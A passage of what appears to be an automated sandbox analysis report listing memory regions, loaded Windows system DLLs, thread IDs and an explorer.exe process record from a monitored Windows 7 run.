filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui")
Region:
id = 747
start_va = 0x1e60000
end_va = 0x1f5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 748
start_va = 0x2040000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002040000"
filename = ""
Region:
id = 749
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 750
start_va = 0x210000
end_va = 0x21ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 751
start_va = 0x1f60000
end_va = 0x203efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f60000"
filename = ""
Region:
id = 752
start_va = 0x6dc60000
end_va = 0x6dc88fff
monitored = 0
entry_point = 0x6dc66b19
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll")
Region:
id = 753
start_va = 0x910000
end_va = 0x94ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 754
start_va = 0x2160000
end_va = 0x219ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002160000"
filename = ""
Region:
id = 755
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 756
start_va = 0x21a0000
end_va = 0x246efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 757
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 758
start_va = 0x745f0000
end_va = 0x7478dfff
monitored = 0
entry_point = 0x7461e6b5
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 759
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 760
start_va = 0x1e0000
end_va = 0x1e1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 761
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 762
start_va = 0x220000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 763
start_va = 0x24c0000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 764
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 765
start_va = 0x77320000
end_va = 0x773a2fff
monitored = 0
entry_point = 0x773223d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 766
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 767
start_va = 0x745b0000
end_va = 0x745d0fff
monitored = 0
entry_point = 0x745b145e
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 768
start_va = 0x772d0000
end_va = 0x77314fff
monitored = 0
entry_point = 0x772d11e1
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 769
start_va = 0x200000
end_va = 0x203fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 770
start_va = 0x260000
end_va = 0x276fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db")
Region:
id = 771
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 772
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 773
start_va = 0x20e0000
end_va = 0x211ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020e0000"
filename = ""
Region:
id = 774
start_va = 0x2570000
end_va = 0x25affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 775
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 777
start_va = 0x742b0000
end_va = 0x742c6fff
monitored = 0
entry_point = 0x742b3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 778
start_va = 0x6b0000
end_va = 0x6ebfff
monitored = 0
entry_point = 0x6b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 779
start_va = 0x6b0000
end_va = 0x6ebfff
monitored = 0
entry_point = 0x6b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 780
start_va = 0x6b0000
end_va = 0x6ebfff
monitored = 0
entry_point = 0x6b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 781
start_va = 0x6b0000
end_va = 0x6ebfff
monitored = 0
entry_point = 0x6b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 782
start_va = 0x6b0000
end_va = 0x6ebfff
monitored = 0
entry_point = 0x6b128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 783
start_va = 0x74270000
end_va = 0x742aafff
monitored = 0
entry_point = 0x7427128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 784
start_va = 0x74430000
end_va = 0x7443dfff
monitored = 0
entry_point = 0x74431235
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 788
start_va = 0x6b0000
end_va = 0x6effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 789
start_va = 0x26d0000
end_va = 0x270ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 790
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 803
start_va = 0x66410000
end_va = 0x6645dfff
monitored = 0
entry_point = 0x6644816e
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")
Thread:
id = 16
os_tid = 0xe4c
Thread:
id = 18
os_tid = 0xe54
Thread:
id = 19
os_tid = 0xe58
Thread:
id = 20
os_tid = 0xe5c
Thread:
id = 21
os_tid = 0xe60
Process:
id = "3"
image_name = "explorer.exe"
filename = "c:\\windows\\explorer.exe"
page_root = "0x40907000"
os_pid = "0xe64"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "rpc_server"
parent_id = "2"
os_parent_pid = "0x248"
cmd_line = "C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 808
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 809
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 810
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 811
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 812
start_va = 0x50000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 813
start_va = 0x150000
end_va = 0x155fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "explorer.exe.mui"
filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui")
Region:
id = 814
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 815
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 816
start_va = 0x180000
end_va = 0x18cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 817
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 818
start_va = 0x1a0000
end_va = 0x1a1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 819
start_va = 0x1b0000
end_va = 0x22ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 820
start_va = 0x230000
end_va = 0x296fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 821
start_va = 0x2a0000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 822
start_va = 0x3a0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 823
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 824
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 825
start_va = 0x6d0000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 826
start_va = 0x1ad0000
end_va = 0x1b0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ad0000"
filename = ""
Region:
id = 827
start_va = 0x1b10000
end_va = 0x1beefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b10000"
filename = ""
Region:
id = 828
start_va = 0x1bf0000
end_va = 0x1bf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001bf0000"
filename = ""
Region:
id = 829
start_va = 0x1c00000
end_va = 0x1c01fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 830
start_va = 0x1c10000
end_va = 0x1c10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c10000"
filename = ""
Region:
id = 831
start_va = 0x1c80000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 832
start_va = 0x1d60000
end_va = 0x1ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d60000"
filename = ""
Region:
id = 833
start_va = 0x1e60000
end_va = 0x1edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 834
start_va = 0x1ee0000
end_va = 0x21aefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 835
start_va = 0x21e0000
end_va = 0x225ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021e0000"
filename = ""
Region:
id = 836
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 837
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 0
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 838
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 839
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 840
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 841
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 842
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 843
start_va = 0xff120000
end_va = 0xff3dffff
monitored = 0
entry_point = 0xff14b790
region_type = mapped_file
name = "explorer.exe"
filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe")
Region:
id = 844
start_va = 0x7fef8df0000
end_va = 0x7fef8eddfff
monitored = 0
entry_point = 0x7fef8df12a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 845
start_va = 0x7fefaf60000
end_va = 0x7fefb129fff
monitored = 0
entry_point = 0x7fefaf67a60
region_type = mapped_file
name = "explorerframe.dll"
filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll")
Region:
id = 846
start_va = 0x7fefb2f0000
end_va = 0x7fefb2fafff
monitored = 0
entry_point = 0x7fefb2f4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 847
start_va = 0x7fefb6f0000
end_va = 0x7fefb71bfff
monitored = 0
entry_point = 0x7fefb6f15c4
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 848
start_va = 0x7fefbc40000
end_va = 0x7fefbc57fff
monitored = 0
entry_point = 0x7fefbc41130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 849
start_va = 0x7fefbd00000
end_va = 0x7fefbd42fff
monitored = 0
entry_point = 0x7fefbd0c168
region_type = mapped_file
name = "duser.dll"
filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll")
Region:
id = 850
start_va = 0x7fefbd50000
end_va = 0x7fefbe41fff
monitored = 0
entry_point = 0x7fefbd7ac20
region_type = mapped_file
name = "dui70.dll"
filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")
Region:
id = 851
start_va = 0x7fefbe50000
end_va = 0x7fefc064fff
monitored = 0
entry_point = 0x7fefc0264b0
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")
Region:
id = 852
start_va = 0x7fefc070000
end_va = 0x7fefc0c5fff
monitored = 0
entry_point = 0x7fefc07bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 853
start_va = 0x7fefc0d0000
end_va = 0x7fefc1fbfff
monitored = 0
entry_point = 0x7fefc0d94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 854
start_va = 0x7fefc250000
end_va = 0x7fefc443fff
monitored = 0
entry_point = 0x7fefc3dc924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 855
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 856
start_va = 0x7fefd040000
end_va = 0x7fefd057fff
monitored = 0
entry_point = 0x7fefd043b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 857
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
monitored = 0
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 858
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
monitored = 0
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 859
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
monitored = 0
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 860
start_va = 0x7fefd6f0000
end_va = 0x7fefd72cfff
monitored = 0
entry_point = 0x7fefd6f18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 861
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
monitored = 0
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 862
start_va = 0x7fefd970000
end_va = 0x7fefd9dbfff
monitored = 0
entry_point = 0x7fefd972780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 863
start_va = 0x7fefda20000
end_va = 0x7fefda55fff
monitored = 0
entry_point = 0x7fefda21474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 864
start_va = 0x7fefda60000
end_va = 0x7fefda79fff
monitored = 0
entry_point = 0x7fefda61558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 865
start_va = 0x7fefdca0000
end_va = 0x7fefdd38fff
monitored = 0
entry_point = 0x7fefdca1c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 866
start_va = 0x7fefdd40000
end_va = 0x7fefde6cfff
monitored = 0
entry_point = 0x7fefdd8ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 867
start_va = 0x7fefde70000
end_va = 0x7fefded6fff
monitored = 0
entry_point = 0x7fefde7b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 868
start_va = 0x7fefdee0000
end_va = 0x7fefec67fff
monitored = 0
entry_point = 0x7fefdf5cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 869
start_va = 0x7fefec70000
end_va = 0x7fefed78fff
monitored = 0
entry_point = 0x7fefec71064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 870
start_va = 0x7fefef30000
end_va = 0x7fefefa0fff
monitored = 0
entry_point = 0x7fefef41e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 871
start_va = 0x7fefefb0000
end_va = 0x7feff08afff
monitored = 0
entry_point = 0x7fefefd0760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 872
start_va = 0x7feff090000
end_va = 0x7feff12efff
monitored = 0
entry_point = 0x7feff0925a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 873
start_va = 0x7feff140000
end_va = 0x7feff15efff
monitored = 0
entry_point = 0x7feff1460e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 874
start_va = 0x7feff1e0000
end_va = 0x7feff2b6fff
monitored = 0
entry_point = 0x7feff1e3274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 875
start_va = 0x7feff2c0000
end_va = 0x7feff2edfff
monitored = 0
entry_point = 0x7feff2c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 876
start_va = 0x7feff2f0000
end_va = 0x7feff4f2fff
monitored = 0
entry_point = 0x7feff313330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 877
start_va = 0x7feff5a0000
end_va = 0x7feff5adfff
monitored = 0
entry_point = 0x7feff5a1080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 878
start_va = 0x7feff5b0000
end_va = 0x7feff678fff
monitored = 0
entry_point = 0x7feff62a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 879
start_va = 0x7feff680000
end_va = 0x7feff856fff
monitored = 0
entry_point = 0x7feff681010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 880
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 881
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 882
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 883
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 884
start_va = 0x7fffffd8000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 885
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 886
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 887
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 898
start_va = 0x1c20000
end_va = 0x1c21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c20000"
filename = ""
Region:
id = 899
start_va = 0x23b0000
end_va = 0x242ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 900
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 901
start_va = 0x1d00000
end_va = 0x1d5bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shell32.dll.mui"
filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui")
Region:
id = 902
start_va = 0x1c30000
end_va = 0x1c33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 903
start_va = 0x1c40000
end_va = 0x1c6ffff
monitored = 1
